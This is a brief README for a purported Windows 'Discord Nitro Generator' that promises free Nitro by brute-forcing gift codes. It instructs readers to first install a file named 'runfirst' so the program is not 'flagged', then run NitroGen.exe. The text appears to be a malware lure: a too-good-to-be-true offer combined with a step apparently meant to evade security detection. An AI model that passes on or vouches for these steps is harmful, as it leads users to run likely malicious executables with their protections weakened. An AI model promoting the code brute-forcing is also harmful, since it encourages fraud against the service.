VerusGhost/Discord_Nitro_Generator_2024_Win64_VerusGhost/README.md

 THIS DISCORD NITRO GENERATOR IS COMPATIBLE WITH WINDOWS ONLY.

-This program will help you to brute force Discord Nitro codes.
-GRAB NITRO FOR FREE

 1. Begin by installing the file named "runfirst".
 (Note: This step is crucial to avoid flagging Discord Nitro Gen.)
 2. Install the program NitroGen.exe.
 3. Allow the installer to complete the process.